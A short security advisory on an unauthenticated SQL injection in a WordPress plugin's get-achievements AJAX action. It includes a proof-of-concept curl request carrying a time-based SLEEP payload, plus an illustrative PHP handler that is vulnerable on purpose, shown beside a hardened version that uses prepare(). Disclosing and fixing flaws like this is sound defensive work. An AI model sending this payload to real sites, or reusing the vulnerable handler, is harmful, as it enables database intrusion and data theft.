The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=get-achievements&total_only=true&user_id=11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb'
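The flaw described above, as an added example that is not the plugin's own code: a hypothetical admin-ajax handler for the get-achievements action that interpolates user_id straight into SQL, beside a hardened version that coerces the value to an integer and binds it through $wpdb->prepare(). The table name, column names and handler bodies are assumptions.

```php
<?php
// Added example (not the plugin's code): a hypothetical admin-ajax handler
// showing the flaw the advisory describes beside a hardened version.
// Table name, column names and the handler body are assumptions.

// VULNERABLE: user_id is interpolated straight into the SQL string, so a
// value such as "11 AND (SELECT SLEEP(5))" becomes part of the query.
function vulnerable_get_achievements() {
    global $wpdb;
    $user_id    = $_POST['user_id'];                    // untrusted, unsanitised
    $total_only = isset( $_POST['total_only'] );
    $table      = $wpdb->prefix . 'achievements';       // hypothetical table

    if ( $total_only ) {
        $sql = "SELECT COUNT(*) FROM $table WHERE user_id = $user_id";
        wp_send_json( array( 'total' => $wpdb->get_var( $sql ) ) );
    }
    $sql = "SELECT id, name FROM $table WHERE user_id = $user_id";
    wp_send_json( $wpdb->get_results( $sql ) );
}

// HARDENED: coerce the parameter to the type it must be and bind it through
// $wpdb->prepare(), so attacker-controlled text can never alter the SQL.
function hardened_get_achievements() {
    global $wpdb;
    $user_id = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
    if ( 0 === $user_id ) {
        wp_send_json_error( 'invalid user_id', 400 );
    }
    $total_only = isset( $_POST['total_only'] ) && 'true' === $_POST['total_only'];
    $table      = $wpdb->prefix . 'achievements';       // hypothetical table

    if ( $total_only ) {
        $total = $wpdb->get_var(
            $wpdb->prepare( "SELECT COUNT(*) FROM {$table} WHERE user_id = %d", $user_id )
        );
        wp_send_json( array( 'total' => (int) $total ) );
    }
    $rows = $wpdb->get_results(
        $wpdb->prepare( "SELECT id, name FROM {$table} WHERE user_id = %d", $user_id )
    );
    wp_send_json( $rows );
}

// Both hooks are registered because the advisory says the endpoint is reachable
// without a session; if the data is not meant to be public, drop the nopriv
// hook and add a capability check (current_user_can) inside the handler.
add_action( 'wp_ajax_get-achievements',        'hardened_get_achievements' );
add_action( 'wp_ajax_nopriv_get-achievements', 'hardened_get_achievements' );
```

With the hardened handler, the time-based payload in the request above is reduced to the integer 11 by absint(), so the SLEEP() never reaches the database.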